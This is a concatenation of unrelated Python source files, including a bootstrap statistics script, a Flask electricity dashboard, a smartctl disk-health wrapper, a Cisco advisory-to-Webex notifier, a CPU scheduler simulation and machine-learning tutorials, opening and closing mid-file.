results.y_min = y_min
results.lambda_ = lambda_
results.normalitzacio = normalitzacio
bootstrap_data.append((lambda_, normalitzacio))
if not bootstrap: return
resamplings = least_resamplings(ys)
resamplings = len(ys)
for i in range(resamplings):
resample_ = resample(ys, len(ys))
lamda_, normalitzacio = lambda_normalitzacio(resample_, y_min)
bootstrap_data.append((lambda_, normalitzacio))
if out is not None:
print y_min, lambda_, normalitzacio
print >> sys.stderr, "bootsraping #%d:%d [y_min: %f]" \
% (i, resamplings - i, y_min), \
"a set of %d elements" % len(ys)
b_lambda_,b_sigma_lambda_,b_norm,b_sigma_norm = estadistica(bootstrap_data)
print "bootstrap",
print y_min, b_lambda_,b_sigma_lambda_,b_norm,b_sigma_norm
results.b_lambda_ = b_lambda_
results.b_sigma_lambda_ = b_sigma_lambda_
results.b_norm = b_norm
results.b_sigma_norm = b_sigma_norm
r = results
print
print "En resum: els resultats de %s" % filename
print "Magnitud estimacio estimacio_botstrap sigma"
print "y_min: %f" % r.y_min
print "lambda_: %f %f %f" % \
(r.lambda_, r.b_lambda_, r.b_sigma_lambda_)
print "norm: %f %f %f" % \
(r.normalitzacio, r.b_norm, r.b_sigma_norm)
print
if __name__ == "__main__":
filename_default = "bursts_all.dat"
try:
filename = sys.argv[1]
except:
filename = filename_default
main(filename, bootstrap=True)
|
from flask import Flask, render_template, url_for, redirect
from reporter_app.electricity_use import bp
from reporter_app import db
from reporter_app.models import User, ElecUse
import pandas as pd
from reporter_app.electricity_use.utils import call_leccyfunc, get_real_power_usage_for_times
from flask_security import auth_required, roles_required
from datetime import datetime, timedelta
@bp.route('/electricity_use')
@auth_required("token", "session")
@roles_required('verified')
def electricity_use():
start_date = datetime.now() - timedelta(hours=24)
e_use_entries = ElecUse.query.filter(ElecUse.date_time>start_date).all()
labels = [row.date_time for row in e_use_entries]
power_e_use_data = [row.electricity_use for row in e_use_entries]
real_power_usage = get_real_power_usage_for_times(labels)
return render_template('electricity_use/electricity_use.html',
data_labels=labels,
power_e_use_data=power_e_use_data,
real_power_usage=real_power_usage)
@bp.route('/electricity_use/48_hours')
@auth_required("token", "session")
@roles_required('verified')
def e_use_48h():
start_date = datetime.now() - timedelta(hours=48)
e_use_entries = ElecUse.query.filter(ElecUse.date_time>start_date).all()
labels = [row.date_time for row in e_use_entries]
power_e_use_data = [row.electricity_use for row in e_use_entries]
real_power_usage = get_real_power_usage_for_times(labels)
return render_template('electricity_use/electricity_use.html',
data_labels=labels,
power_e_use_data=power_e_use_data,
real_power_usage=real_power_usage)
@bp.route('/electricity_use/7_days')
@auth_required("token", "session")
@roles_required('verified')
def e_use_7d():
start_date = datetime.now() - timedelta(days=7)
e_use_entries = ElecUse.query.filter(ElecUse.date_time>start_date).all()
labels = [row.date_time for row in e_use_entries]
power_e_use_data = [row.electricity_use for row in e_use_entries]
real_power_usage = get_real_power_usage_for_times(labels)
return render_template('electricity_use/electricity_use.html',
data_labels=labels,
power_e_use_data=power_e_use_data,
real_power_usage=real_power_usage)
@bp.route('/electricity_use/28_days')
@auth_required("token", "session")
@roles_required('verified')
def e_use_28d():
start_date = datetime.now() - timedelta(days=28)
e_use_entries = ElecUse.query.filter(ElecUse.date_time>start_date).all()
labels = [row.date_time for row in e_use_entries]
power_e_use_data = [row.electricity_use for row in e_use_entries]
real_power_usage = get_real_power_usage_for_times(labels)
return render_template('electricity_use/electricity_use.html',
data_labels=labels,
power_e_use_data=power_e_use_data,
real_power_usage=real_power_usage)
@bp.route('/electricity_use/all')
@auth_required("token", "session")
@roles_required('verified')
def e_use_all():
e_use_entries = ElecUse.query.all()
labels = [row.date_time for row in e_use_entries]
power_e_use_data = [row.electricity_use for row in e_use_entries]
real_power_usage = get_real_power_usage_for_times(labels)
return render_template('electricity_use/electricity_use.html',
data_labels=labels,
power_e_use_data=power_e_use_data,
real_power_usage=real_power_usage)
|
# -*- coding: utf-8 -*-
# Depends: smartctl
from __future__ import print_function
try:
from . import Helper
except:
import Helper
import os
import stat
import re
import sys
class SmartInfo(object):
def __init__(self, device):
self.device = None
self.information = []
self.attributes = []
self.selftests = []
self.errors = []
self.capabilities = {}
device = "/dev/" + device
if self.__canUseSmartctl():
# sicher stellen, dass device ein Block-Device ist
if self.__isBlockDevice(device):
self.device = device
else:
self.information.append( ("Achtung!", "%s ist keine Festplatte" % (device,)) )
def __parseInformationSection(self):
if self.device:
cmd = [ "/usr/sbin/smartctl", "-i", self.device ]
lsblkOutput = Helper.sub_process(cmd)
inSection = False
self.information = []
for line in lsblkOutput.splitlines():
if inSection:
try:
key, val = line.split(':',1)
self.information.append( (key.strip(), val.strip()) )
except:
pass
if line == '=== START OF INFORMATION SECTION ===':
inSection = True
self.__parseCapabilities()
def __parseAttributesBlock(self):
if self.device:
cmd = [ "/usr/sbin/smartctl", "-Aj", self.device ]
out = Helper.sub_process(cmd)
attributes = Helper.json_loads(out)
if attributes:
table = attributes["ata_smart_attributes"]["table"]
self.attributes = []
for attr in table:
failed = 'ok'
if 'when_failed' in attr and attr['when_failed'] != '':
failed = attr["when_failed"]
thresh = ''
if 'tresh' in attr:
tresh = str(attr[thresh])
line = ( str(attr['id']), attr['name'].replace("_", " "), failed, str(attr["value"]), str(attr["worst"]), thresh, attr['raw']['string'] )
self.attributes.append(line)
def __parseSelftestsLog(self):
if self.device:
cmd = [ "/usr/sbin/smartctl", "-jl", "selftest", self.device ]
out = Helper.sub_process(cmd)
try:
selftests = Helper.json_loads(out)
logged = selftests["ata_smart_self_test_log"]["standard"]["table"]
for item in logged:
self.selftests.append( (item["type"]["string"].encode("ascii"), item["status"]["string"].encode("ascii") ) )
except:
pass
def __parseErrorLog(self):
if self.device:
cmd = [ "/usr/sbin/smartctl", "-jl", "error", self.device ]
out = Helper.sub_process(cmd)
try:
selftests = Helper.json_loads(out)
logged = selftests["ata_smart_error_log"]["summary"]["table"]
for item in logged:
self.selftests.append( (item["type"]["string"].encode("ascii"), item["status"]["string"].encode("ascii") ) )
except:
pass
def __parseCapabilities(self):
if self.device:
cmd = [ "/usr/sbin/smartctl", "-jc", self.device ]
out = Helper.sub_process(cmd)
try:
cap = Helper.json_loads(out)
for c in cap["ata_smart_data"]["capabilities"]:
self.capabilities[c] = cap["ata_smart_data"]["capabilities"][c]
except:
pass
try:
self.capabilities["poll_short_test"] = cap["ata_smart_data"]["self_test"]["polling_minutes"]["short"]
except:
self.capabilities["poll_short_test"] = None
def __isBlockDevice(self, device):
mode = os.stat(device).st_mode
return stat.S_ISBLK(mode)
# Versuch sicherzustellen, dass smartctl installiert und neu genug ist.
# Das Plugin benutzt das JSON-Interface, um Parsing-Aufwand zu vermeiden.
# Wenn keine passende Version gefunden wird, wird dies über die Informationen
# zurückgeliefert und angezeigt.
def __canUseSmartctl(self):
try:
cmd = [ "/usr/sbin/smartctl", "-V", ]
out = Helper.sub_process(cmd)
except:
self.information.append( ("Achtung!", '"smartmontools" ist nicht installiert oder defekt.') )
return False
match = re.search("smartmontools release (.*?) ", out, re.MULTILINE)
if match:
version = match.group(1)
if version < "7.0":
self.information.append( ("Achtung!", '"smartmontools" sind zu alt (< 7.0)') )
return False
else:
self.information.append( ("Achtung!", '"smartmontools" Version kann nicht ermittelt werden.') )
return False
return True
def startShortSelftest(self):
if self.device:
cmd = [ "/usr/sbin/smartctl", "-t", "short", self.device ]
out = Helper.sub_process(cmd)
print("[SmartControl]", out)
self.selftests = []
def getDeviceInformation(self):
if not self.information:
self.__parseInformationSection()
return self.information
def getCapabilities(self):
if not self.capabilities:
self.__parseCapabilities()
return self.capabilities
# returns list of ascii tuples (id, name, failed, value, worst, thresh, raw)
def getAttributes(self):
if not self.attributes:
self.__parseAttributesBlock()
return self.attributes
# returns list of ascii tuples (type, status)
def getSelftestsLog(self):
if not self.selftests:
self.__parseSelftestsLog()
return self.selftests
# returns list of ascii tuples (type, status)
def getErrorLog(self):
if not self.errors:
self.__parseErrorLog()
return self.errors
if __name__ == "__main__":
import Helper
d = SmartInfo("sda")
# print(d.getDeviceInformation())
print(d.getAttributes())
|
from openVulnQuery import query_client
import csv
import sys,os
import datetime
import json
from webexteamssdk import WebexTeamsAPI
import schedule
import time
api_id = None
api_secret = None
webex_token = None
webex_room_id = None
webex_api = None
class Advisory():
def __init__(self,advisory):
self.advisory_title = advisory.advisory_title
self.severity = advisory.sir
self.summary = advisory.summary
self.cvss_base_score = advisory.cvss_base_score
self.all_product_names = advisory.product_names
self.cvrfUrl = advisory.cvrfUrl
self.first_published = advisory.first_published
self.last_updated = advisory.last_updated
self.bug_ids = advisory.bug_ids
self.workaround = None
self.fix = None
self.bug_ids = None
self.concerned_products = []
def firewall_only(self): #clean product array for Cisco Firewalls
for p in self.all_product_names:
if p.find("Firepower") !=-1 or p.find("Adaptive Security Appliance") != -1 or p.find("ASA") != -1 or p.find("FX-OS") != -1 or p.find("fx-os")!=-1 :
self.concerned_products.append(p)
def fxos_only(self):
for p in self.all_product_names:
if p.find("FX-OS") !=-1 or p.find("FXOS") !=-1:
self.concerned_products.append(p)
def ise_only(self): #clean product array for Cisco ISE
for p in self.all_product_names:
if p.find("Identity Services Engine") != -1:
self.concerned_products.append(p)
def get_report(advisories,product):
today = str(datetime.date.today())
file_name = product+today+".csv"
with open(file_name,'w') as f:
fieldnames = ['First_Published','Advisory','Severity','Summary','Product Names','cvss_base_score']
writer = csv.DictWriter(f,fieldnames=fieldnames)
writer.writeheader()
advisory_flag = 0
for a in advisories:
if a.first_published.find(today) != -1:
advisory_flag = 1
dict = {'First_Published':a.first_published,
'Advisory':a.advisory_title,
'Severity':a.severity,
'Summary':a.summary,
'Product Names':a.concerned_products,
'cvss_base_score':a.cvss_base_score }
writer.writerow(dict)
return advisory_flag
def get_firewall_advisories():
today = str(datetime.date.today())
q_client = query_client.OpenVulnQueryClient(client_id=api_id,client_secret=api_secret)
firewall_advisory = q_client.get_by_product('default','asa')
firewall_advisories = []
for a in firewall_advisory:
adv_obj = Advisory(a)
adv_obj.firewall_only()
firewall_advisories.append(adv_obj)
print("getting report")
if (get_report(firewall_advisories,"firewall") == 1):
webex_api.messages.create(roomId=webex_room_id,
markdown= "Firewall PSIRT alert for " + today )
file_list = ["firewall"+today+".csv"]
webex_api.messages.create(roomId=webex_room_id,
files = file_list )
else:
webex_api.messages.create(roomId=webex_room_id,
markdown= "No Firewall PSIRT announced today ")
def get_ise_advisories():
today = str(datetime.date.today())
q_client =query_client.OpenVulnQueryClient(client_id=api_id,client_secret=api_secret)
ise_advisory = q_client.get_by_product('default','Identity Services Engine')
ise_advisories = []
for a in ise_advisory:
adv_obj = Advisory(a)
adv_obj.ise_only()
ise_advisories.append(adv_obj)
if (get_report(ise_advisories,"ise")==1):
webex_api.messages.create(roomId=webex_room_id,
markdown= "ISE PSIRT alert for " + today)
file_list = ["ise"+today+".csv"]
webex_api.messages.create(roomId=webex_room_id,
files = file_list )
else :
webex_api.messages.create(roomId=webex_room_id,
markdown= "No ISE PSIRT announced today ")
def get_fxos_advisories():
today = str(datetime.date.today())
q_client =query_client.OpenVulnQueryClient(client_id=api_id,client_secret=api_secret)
fxos_advisory = q_client.get_by_product('default','fxos')
fxos_advisories = []
for a in fxos_advisory:
adv_obj = Advisory(a)
adv_obj.fxos_only()
fxos_advisories.append(adv_obj)
if (get_report(fxos_advisories,"fxos") ==1):
webex_api.messages.create(roomId=webex_room_id,
markdown= "FXOS PSIRT alert for " + today )
file_list = ["fxos"+today+".csv"]
webex_api.messages.create(roomId=webex_room_id,
files = file_list)
else :
webex_api.messages.create(roomId=webex_room_id,
markdown= "No FXOS PSIRT announced today")
def daily_check():
print("Checking for any new PSIRT")
get_firewall_advisories()
get_ise_advisories()
get_fxos_advisories()
if __name__=='__main__':
today = str(datetime.date.today())
api_id = input("Please enter your api client_id \n")
api_secret = input("Please enter your api client secret \n")
webex_token = input("Please enter your webex access_token \n")
webex_room_id = input("Please enter your webex room_id \n")
pid = os.fork()
if pid != 0:
sys.exit()
print(" running script in the background")
webex_api = WebexTeamsAPI(access_token=webex_token)
daily_check()
schedule.every().day.at("23:55:00").do(daily_check)
while 1:
schedule.run_pending()
time.sleep(100)
|
from framework.data.constants import BASE_URL, HEADERS, REDIRECT, STATUS
from framework.utils.service_utils import send_request
def request_headers(headers=None):
url = '{}{}'.format(BASE_URL, HEADERS)
return send_request(url, headers=headers)
def request_redirect(count):
url = '{}{}{}'.format(BASE_URL, REDIRECT, count)
return send_request(url, return_history=True)
def request_status(status):
url = '{}{}{}'.format(BASE_URL, STATUS, status)
return send_request(url)
|
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load in
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import GridSearchCV
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_val_score
from sklearn.metrics import log_loss
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import PolynomialFeatures
from xgboost.sklearn import XGBModel
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory
import os
print(os.listdir("../input"))
## Reading data into environment
data = pd.read_csv("../input/data.csv")
data.isnull().sum()
# Shot ID's for submission data
shot_ids = (data[data.shot_made_flag.isnull() == True]).shot_id
## Adding a year column
data['yr'] = data.game_date[:4]
## Adding column representing if Lakers are visitng another Team
data['is_away'] = data.matchup.str.contains('@').astype(int)
## Adding a column for total time remaining
data['total_time'] = data.seconds_remaining + (60*data.minutes_remaining)+0.00001
## Distance * Time Remaining
data['Super-Feature1'] = np.log(data.total_time)
#Dropping stuff
data = data.drop(['season', 'combined_shot_type','game_id','lat','lon',
'team_id','team_name','game_date','matchup','shot_id','shot_zone_area','shot_zone_basic','shot_zone_range'], axis = 1)
#One Hot Encoding
data = pd.get_dummies(data, columns = ['yr','action_type','shot_distance','minutes_remaining','period','playoffs','shot_type','opponent'])
# Seperating submission data out
submission_data = data[data.shot_made_flag.isnull() == True]
data = data[data.shot_made_flag.isnull() == False]
submission_data_X = submission_data.drop(['shot_made_flag'], axis =1)
submission_data_y = submission_data.shot_made_flag
data_X = data.drop(['shot_made_flag'], axis =1 )
data_y = data.shot_made_flag
#Train-Test split
X_train, X_test, y_train, y_test = train_test_split(data_X,data_y, random_state = 11230, test_size = 0.3)
# Modelling with Logit
model = LogisticRegression(penalty = 'l2',C=0.5) # Hyper params found through Grid Search shown below
model.fit(X = X_train,y = y_train)
confusion_matrix(y_true = y_test, y_pred = model.predict(X_test))
roc_auc_score(y_true = y_test, y_score = model.predict_proba(X_test)[:,1])
log_loss(y_true = y_test, y_pred = model.predict_proba(X_test)[:,1])
# Modelling with XGBoost
model_XGB = XGBModel()
model_XGB.fit(X_train, y_train)
log_loss(y_true = y_test, y_pred = model_XGB.predict(X_test))
roc_auc_score(y_true = y_test, y_score = model_XGB.predict(X_test))
## Grid Search with Logit
#param_grid = {'penalty':['l1','l2'],'C': np.arange(0.1, 2.0, 0.025)}
#GS = GridSearchCV(model, param_grid, cv = 5, scoring = 'roc_auc')
#GS.fit(X_train, y_train)
# Submission
submission= pd.DataFrame({'shot_id':shot_ids, 'shot_made_flag': model.predict(submission_data_X)})
submission.to_csv(index = False, path_or_buf ='submission.csv') |
from InstIO import *
from DeviceManager import *
class CPU:
def __init__(self,deviceManager,queueReady,resultQueue,waitingProcess):
self.deviceManager = deviceManager
self.queueReady = queueReady
self.resultQueue = resultQueue
self.waitingProcess = waitingProcess
self.isActive = True
def setActive(self, newState):
self.isActive = newState
def getActive(self):
return self.isActive
def switchToDeviceManager(self,pcb):
"""Envia el pcb al DeviceManager """
self.deviceManager.switchToDevice(pcb)
def terminoProceso(self,pcb):
"""Me dice si un PCB terminó su ejecución"""
return len(pcb.getProgram().getInstructions())<=pcb.getPC()
def execute(self,pcb,quantum):
"""Comienza con la ejecución de un determinado PCB"""
if not pcb.isWaiting() and not self.terminoProceso(pcb): #Chequea estados
if(quantum == -1): #indicador de ejecución FCFS
salioDeCPU = False
while (not self.terminoProceso(pcb) and not salioDeCPU): #Mientras el proceso no haya terminado su ejecución y no haya salido de CPU
salioDeCPU = self.processInstruction(pcb) #procesa la instrucción indicandome si la ejecutó o si salió de CPU
else:
self.executeWithQuantum(pcb,quantum)
isTerminated = self.terminoProceso(pcb)
if(isTerminated and(not pcb.isTerminated())): #Chequea estado del PCB
pcb.setTerminated() #Actualiza su estado
if(self.hasParentWaiting(pcb)): #Si tiene un PCB padre en espera lo despierta
self.wakeUpParent(pcb)
else: print("@CPU: El PCB del programa", pcb.getProgram().getName()," ha terminadó su ejecución")
def processInstruction(self,pcb):
"""Procesa la instrucción correspondiente del PCB"""
currentInstruction=pcb.getProgram().getInstructions()[pcb.getPC()]
if isinstance(currentInstruction,InstIO): #Chequea el tipo de instrucción
self.switchToDeviceManager(pcb)
return True #Indica que salió de CPU
else:
currentInstruction.execute(self,pcb) #Ejecuta la instrucción
pcb.setPC(pcb.getPC()+1) #Aumenta el PC
if(pcb.isWaiting()): #Chequea estado
return True
else:
self.resultQueue.put(currentInstruction)
return False
def executeWithQuantum(self,pcb,quantum):
"""Comienzo de ejecución con politica de planificación Round Robin"""
quantumSaved = quantum
estaEnReadyOEnIO = False
while (not self.terminoProceso(pcb) and not estaEnReadyOEnIO and quantum>0): #Cheque estados
if self.surpassQuantum(pcb,quantumSaved): #Si no le alcanza el quantum manda el PCB a la cola de listos y resetea su quantum
self.switchToReady(pcb)
self.resetQuantum(quantum)
estaEnReadyOEnIO = True
else: #Ejecuta la instrucción
timeInst = pcb.getProgram().getInstructions()[pcb.getPC()].getTime()
quantumSaved = quantumSaved - timeInst
estaEnReadyOEnIO = self.processInstruction(pcb)
def surpassQuantum(self,pcb,quantum):
"""Me dice si una determinada instricción se puede ejecutar con el quantum indicado"""
return pcb.getProgram().getInstructions()[pcb.getPC()].getTime() > quantum
def switchToReady(self,pcb):
"""Encola un PCB a la cola de listos"""
self.queueReady.put(pcb)
def resetQuantum(self,originalQuantum):
"""Restablece el quntum con el parámetro"""
self.quantum=originalQuantum
def forkChildPCB(self,childPCB,pcbParent):
"""Indica el PCB padre que tiene un PCB hijo, y pone en la cola de listos al PCB hijo"""
self.waitingProcess[childPCB.getId()] = pcbParent
print("@CPU: Se ha puesto el PCB padre en la cola de espera")
self.queueReady.put(childPCB)
print("@CPU: Se ha puesto el PCB hijo en la cola de listos")
def hasParentWaiting(self,pcb):
"""Me dice si un determinado PCB tiene a un PCB padre en espera"""
return pcb.getId() in self.waitingProcess.keys()
def wakeUpParent(self, pcb):
"""Saca a un determinado PCB de la cola de espera, le cambia su estabo y lo pone en la cola de listos"""
pcbToWake = self.waitingProcess.pop(pcb.id)
pcbToWake.setReady()
self.switchToReady(pcbToWake)
print("@CPU: El PCB padre del programa", pcb.getProgram().getName()," ha sido encolado a la cola de listos")
def shutDown(self):
self.setActive(False)
|
from .ask_auth_correctness import StateAskAuthCorrectness
from .ask_scores import StateAskScores
from .auth import StateAuth
from .calc import StateCalc
from .greeting import StateGreeting
from .menu import StateMenu
from .ratings import StateRatings
from .settings import StateSettings
from .start import StateStart
from components import Utils
from config import STATES_COLLECTION_NAME
class State:
"""
Class for working with states
"""
def __init__(self, sdk):
self.sdk = sdk
self.collection = STATES_COLLECTION_NAME
# Dict of available states
self.states_list = {}
async def goto(self, payload, state_name=None, data=None):
"""
Change state and call its before function
Example:
> return await self.controller.goto(payload, 'auth', {'login': 'user273'})
:param dict payload:
:param string state_name:
:param dict data:
:return void:
"""
self.sdk.log("GOTO state {}".format(state_name))
# Update state
self.__set(payload, state=state_name, data=data)
if state_name is not None:
# Call state's before function
await self.get_state_class(state_name).before(payload, data)
# Call wait user answer
await self.sdk.broker.api.wait_user_answer(
payload['user'],
payload['chat'],
bot=payload.get('bot', None)
)
async def process(self, payload, data=None):
"""
Trigger process() command for current state
:param dict payload:
:param data:
:return:
"""
# Get current state from DB
state = self.__get(payload)
self.sdk.log("Process state {} for chat {}".format(state['name'] if state else None, payload['chat']))
# If state name is missing the return null
if not state or 'name' not in state:
return
# Find state class in map
state_class = self.get_state_class(state['name'])
# Call process function for target state
await state_class.process(payload, data if data is not None else state['data'])
async def reenter(self, payload):
"""
Reenter to current state
:param payload:
:return:
"""
# Get current state from DB
current_state = self.__get(payload)
# Do nothing if current state in none
if current_state is None:
return
# Enter to current state again
await self.goto(payload, current_state['name'], current_state['data'])
def is_state_exist(self, name):
"""
Check for a state existing
:param string name:
:return boolean:
"""
# Check for a state with target name existing in a states_list dict
return name in self.states_list
def get_state_class(self, name):
"""
Get state class helper if it is exists
:param string name: state name
:return:
"""
# If state is not exist then throw an exception
if not self.is_state_exist(name):
raise Exception('Can not find class for state {}'.format(name))
# Otherwise return state class
return self.states_list[name](self)
def __get(self, payload):
"""
Get state from DB for target chat
:param dict payload:
:return dict: state from db: _id, chat, name, data, class
"""
# Get current state from db
current_state = self.sdk.db.find_one(
Utils.create_collection_name(self.collection, payload),
{'chat': payload['chat']}
)
# Return None if state is missing
if not current_state:
return None
# Fill class param in dictionary
current_state['class'] = self.get_state_class(current_state['name'])
# Return current state data
return current_state
def __set(self, payload, state=None, data=None):
"""
Set state for target chat
Example:
> await self.set(payload, state='start', data=None)
:param dict payload:
:param string state:
:param dict data:
:return:
"""
self.sdk.log("Set state {} for chat {}".format(state, payload['chat']))
# If unexisted state was passed then throw an exception
if not self.is_state_exist(state):
raise Exception("State with name {} is not exist".format(state))
# Prepare state data to be saved
chat_state = {
# Target chat
'chat': payload['chat'],
# State name
'name': state,
# Additional data for state
'data': data
}
# Update state for target chat in db
self.sdk.db.update(
# Collection name
Utils.create_collection_name(self.collection, payload),
# Find params
{'chat': chat_state['chat']},
# Data to be saved
chat_state,
# Upsert = true
True
)
|
from django.db import models
class Rabbit(models.Model):
name = models.CharField(max_length=30, null=False, blank=False, unique=True)
carrots = models.PositiveIntegerField(null=False)
def __str__(self):
return self.name
|
from typing import Union
# System level concepts
# ---------------------
# An absolute path to a file on the local filesystem
FilePath = str
# An absolute path to an executable file on the local filesystem
ExecutablePath = str
# An absolute path to a directory on the local filesystem (with no trailing slash)
DirectoryPath = str
# Notes directory level concepts
# ------------------------------
# An absolute path to a note from the root of the notes directory
NotePath = str
# An absolute path to a non-note file from the root of the notes directory
ResourcePath = str
# An absolute path to any file from the root of the notes directory
InternalAbsoluteFilePath = Union[NotePath, ResourcePath]
# A subdirectory within the notes directory
Subdir = str
# An absolute path to any file or directory from the root of the notes directory
InternalAbsolutePath = Union[InternalAbsoluteFilePath, Subdir]
# A nicely formatted version of a note path
DisplayPath = str
# A relative path to a note from another note.
# Typically must be transformed into a NotePath before it can be used
RelativeNotePath = str
# A relative path to a resource from a note.
# Typically must be transformed into a ResourcePath before it can be used
RelativeResourcePath = str
# A relative path from a note to another file
InternalRelativeFilePath = Union[RelativeNotePath, RelativeResourcePath]
# A relative path within the notes directory to a subdir
RelativeDirectoryPath = str
# A relative path from a note to either a file or directory
InternalRelativePath = Union[InternalRelativeFilePath, RelativeDirectoryPath]
# Note level concepts
# -------------------
# The full raw string content of a note
RawNoteContent = str
# The full raw conntent of a single line in a note
RawNoteLine = str
# A URL which points to an external resource
ExternalURL = str
# API level concepts
# ------------------
ACKResponse = str
CSVData = str
JSONShorthandConfig = str
JSONShorthandConfigUpdates = str
JSONSearchResults = str
JSONTOC = str
JSONSubdirs = str
JSONLinks = str
|
import os
import tarfile
from six.moves import urllib
import pandas as pd
import pprint
import matplotlib.pyplot as plt
import subprocess
import numpy as np
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
DOWNLOAD_ROOT = 'https://raw.githubusercontent.com/ageron/handson-ml/master/'
HOUSING_PATH = "datasets/housing"
HOUSING_URL = DOWNLOAD_ROOT + HOUSING_PATH + '/housing.tgz'
datasets_path = BASE_DIR + '/' + HOUSING_PATH
def fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):
"""Download data from url."""
if not os.path.isdir(datasets_path):
os.makedirs(datasets_path)
tgz_path = os.path.join(datasets_path, "housing.tgz")
urllib.request.urlretrieve(housing_url, tgz_path)
housing_tgz = tarfile.open(tgz_path)
housing_tgz.extractall(path=datasets_path)
housing_tgz.close()
def load_housing_data(housing_path=datasets_path):
"""Read csv by pandas."""
csv_path = os.path.join(housing_path, 'housing.csv')
return pd.read_csv(csv_path)
# download data
#fetch_housing_data()
print('# download data success!')
# head()
print('\n# head()\n')
housing = load_housing_data()
pprint.pprint(housing.head()) # look first 5 rows.
# info()
print('\n# info()\n')
pprint.pprint(housing.info()) # get a quick description fo the data.
# value_count()
print('\n# ocean_proximity value_counts()\n')
pprint.pprint(housing['ocean_proximity'].value_counts())
# describe()
print('\n# describe()\n')
pprint.pprint(housing.describe())
# hist()
print('\n# hist()\n')
housing.hist(bins=50, figsize=(20, 15))
plt.savefig('p1')
subprocess.call(['catimg', '-f', 'p1.png'])
#split data
# from testset import split_train_test_by_id
# print("\nSplit data.\n")
# housing_with_id = housing.reset_index() # adds an 'index' colume
# train_set, test_set = split_train_test_by_id(housing_with_id, 0.2, "index")
# print(len(train_set), "train + ", len(test_set), "test")
# split data use sklearn learn
# from sklearn.model_selection import train_test_split
# train_set, test_set = train_test_split(housing, test_size=0.2, random_state=42)
# print(len(train_set), "train + ", len(test_set), "test")
# income_cat
housing['income_cat'] = np.ceil(housing['median_income'] / 1.5)
housing['income_cat'].where(housing['income_cat'] < 5, 5.0, inplace=True)
from sklearn.model_selection import StratifiedShuffleSplit
split = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)
for train_index, test_index in split.split(housing, housing['income_cat']):
strat_train_set = housing.loc[train_index]
strat_test_set = housing.loc[test_index]
pprint.pprint(housing['income_cat'].value_counts() / len(housing))
# remove income_cat
for set_ in (strat_train_set, strat_test_set):
set_.drop(['income_cat'], axis=1, inplace=True)
# Discover and Visualize the Data to gain insights
housing = strat_train_set.copy()
housing.plot(kind="scatter", x="longitude", y="latitude", alpha=0.1)
plt.savefig('p2')
subprocess.call(['catimg', '-f', 'p2.png'])
housing.plot(
kind="scatter",
x="longitude",
y="latitude",
alpha=0.4,
s=housing['population'] / 100,
label="population",
c="median_house_value",
cmap=plt.get_cmap("jet"),
colorbar=True,
)
plt.savefig('p3')
subprocess.call(['catimg', '-f', 'p3.png'])
# Look for Correlations
# way 1
# corr_matrix = housing.corr()
# pprint.pprint(corr_matrix['median_house_value'].sort_values(ascending=False))
# end way 1
# way 2
from pandas.tools.plotting import scatter_matrix
attribute = ['median_house_value', 'median_income', 'total_rooms', 'housing_median_age']
scatter_matrix(housing[attribute], figsize=(12, 8))
plt.savefig('p4')
subprocess.call(['catimg', '-f', 'p4.png'])
housing.plot(kind='scatter', x='median_income', y="median_house_value", alpha=0.1)
plt.savefig('p5.png')
subprocess.call(['catimg', '-f', 'p5.png'])
# Experimenting with Attribute Combinations
housing["rooms_per_household"] = housing["total_rooms"] / housing['households']
housing['bedrooms_per_room'] = housing["total_bedrooms"] / housing['total_rooms']
housing['population_per_household'] = housing['population'] / housing['households']
corr_matrix = housing.corr()
pprint.pprint(corr_matrix['median_house_value'].sort_values(ascending=False))
housing = strat_train_set.drop('median_house_value', axis=1)
housing_labels = strat_train_set['median_house_value'].copy()
# Data clearning
from sklearn.preprocessing import Imputer
imputer = Imputer(strategy="median")
housing_num = housing.drop('ocean_proximity', axis=1)
imputer.fit(housing_num)
pprint.pprint(imputer.statistics_)
pprint.pprint(housing_num.median().values)
X = imputer.transform(housing_num)
housing_tr = pd.DataFrame(X, columns=housing_num.columns)
# Handing text and categorical Attributers
# way 1
from sklearn.preprocessing import LabelEncoder
encoder = LabelEncoder()
housing_cat = housing['ocean_proximity']
housing_cat_encoded = encoder.fit_transform(housing_cat)
pprint.pprint(housing_cat_encoded)
pprint.pprint(encoder.classes_)
from sklearn.preprocessing import OneHotEncoder
encoder = OneHotEncoder()
housing_cat_1hot = encoder.fit_transform(housing_cat_encoded.reshape(-1, 1))
pprint.pprint(housing_cat_1hot.toarray())
# way 2
from sklearn.preprocessing import LabelBinarizer
encoder = LabelBinarizer()
housing_cat_1hot = encoder.fit_transform(housing_cat)
pprint.pprint(housing_cat_1hot)
# Customer transformers
from sklearn.base import BaseEstimator, TransformerMixin
room_ix, bedrooms_ix, population_ix, household_ix = 3, 4, 5, 6
class CombinedAttributesAdder(BaseEstimator, TransformerMixin):
"""Custom transform class."""
def __init__(self, add_bedrooms_per_room=True):
self.add_bedrooms_per_room = add_bedrooms_per_room
def fit(self, X, y=None):
return self # nothing else to do
def transform(self, X, y=None):
rooms_per_household = X[:, room_ix] / X[:, household_ix]
population_per_household = X[:, population_ix] / X[:, household_ix]
if self.add_bedrooms_per_room:
bedrooms_per_room = X[:, bedrooms_ix] / X[:, room_ix]
return np.c_[X, rooms_per_household, population_per_household,
bedrooms_per_room]
else:
return np.c_[X, rooms_per_household, population_per_household]
attr_adder = CombinedAttributesAdder(add_bedrooms_per_room=False)
housing_extra_attribs = attr_adder.transform(housing.values)
# Transformation Pipelines
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler # ScandardScaler data
from sklearn.pipeline import FeatureUnion
class DataFrameSelector(BaseEstimator, TransformerMixin):
"""Custom Transformer for sklearn to handle pandas Dataframes."""
def __init__(self, attribute_names):
